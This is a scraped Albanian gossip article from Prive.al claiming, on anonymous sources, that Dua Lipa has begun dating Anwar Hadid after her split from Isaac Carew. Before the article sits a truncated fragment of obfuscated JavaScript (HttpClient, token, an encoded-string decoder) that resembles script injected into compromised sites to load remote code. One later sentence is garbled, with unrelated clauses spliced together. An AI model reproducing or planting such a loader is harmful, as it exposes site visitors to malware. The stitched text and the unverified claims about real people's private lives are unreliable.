;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Prive zbulon: Dua drejt romancës së re, ky model po i vjedh zemrën

By

Pak kohë më parë u bë i ditur lajmi se Dua Lipa dhe Isaac Carew i kanë dhënë fund lidhjes së tyre.

Romanca e nisur katër vite më parë nuk funksionoi as në shansin e dytë pas një ndarje të çiftit e ribashkimi të mëvomshëm.

Ishte Isaac ai i cili mori vëmëndjen më të madhe për faktin se publikisht e zbuloi që po e përjeton rëndë ndarjen duke lënë të kuptohet se me gjasë, ndarja ishte më shumë vullnet i Duas, e cila po vazhdon e papenguar angazhimet e saj.

Por, Dua duket që jo vetëm se nuk ka probleme nga ndarja me Isaac por tashmë ka nisur takimet romantike me një tjetër model.

Djali që po i vjedh zemrën këngëtares me origjinë nga Kosova është Anwar Hadid, vëllai i super-modeleve të njohura Gigi e Bella.

(LAJMI VIJON NËN FOTO)

 

View this post on Instagram

 

A post shared by A+ (@anwarhadid) on

Këtë e kanë konfirmuar për Prive.al burime tejet të sigurta pranë dy protagonistëve.

‘Dua është takuar me Hadid edhe gjatë muajve të fundit të lidhjes me Isaac. Tanimë kur kapitulli me Isaac ka përfunduar në mënyrë definitive, dyshja po frekuentohen çdo herë e më shumë me njëri – tjetrin. Romanca është në fillimet e saj, drejt konsolidimit’ – ka rrëfyer burimi ekskluzivisht për Prive.al.

Aktualisht në internet qarkullojnë fotografi vetëm të Duas me motrat e Anwar, Bella dhe Gigi teksa vlen i cili është përfolur për lidhje me Kendall Jenner të ceket se ky i fundit është tre vite më i ri se Dua, ndryshe prej Isaac i cili ishte tetë më i madh. Se si do të evolojë ky raport mbetet të shihet me kohën. Aktualisht, është vetëm në fazat e para dhe Prive.al ua zbuloi ekskluzivisht, si gjithmonë, e para!

 

Artikuj të ngjashëm